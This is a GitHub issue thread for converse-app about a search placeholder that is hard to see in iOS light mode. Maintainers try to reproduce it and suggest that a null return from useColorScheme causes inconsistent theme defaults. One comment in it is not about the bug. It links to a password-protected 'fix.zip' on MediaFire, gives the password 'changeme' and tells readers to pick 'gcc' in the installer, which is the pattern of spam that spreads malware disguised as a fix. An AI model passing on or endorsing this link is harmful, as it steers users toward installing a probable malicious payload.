### ISSUE TITLE
"Search" placeholder text is hard to see on iOS light mode

### ISSUE THREAD

**Issue by saulmc** [ephemeraHQ/converse-app#589] opened 2024-08-28 04:01 UTC
It looks like the dark mode text style is being used in light mode.
<img src ="https://github.com/user-attachments/assets/ab8491af-8a9a-445d-934d-5cc85327285b" width=350/><img src ="https://github.com/user-attachments/assets/ba497853-a448-4ab9-9050-ff656f935917" width=350/>

**Comment by royalkush** [comment] 2024-08-28 04:55
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lourou** [comment] 2024-08-29 13:51
Tried in battery-saving mode as shown in the screenshots, switching between light and dark mode multiple times, but unable to reproduce. Do you have a way to reproduce this @saulmc?

**Comment by alexrisch** [comment] 2024-10-02 02:25
I believe this was related to color scheme default usage

I believe what's going on is:
```
const colorScheme = useColorScheme
// colorScheme can sometimes be null
```
In certain places in the app we would default to dark mode, or light mode
ie: 
```
if (colorScheme === "light")
```
or
```
if (colorScheme === "dark")
```

We need to pattern this to always be light mode (right now it should now always default to light mode, so only check if it's dark mode

I believe it's an issue with useColorScheme that can occasionally return null (it's known that it _can_ be null) but seems inconsistent to test

**Comment by alexrisch** [comment] 2024-11-20 18:31
Duplicate of a different issue

**Closed by alexrisch** 2024-11-20 18:31 UTC
Labels: bug
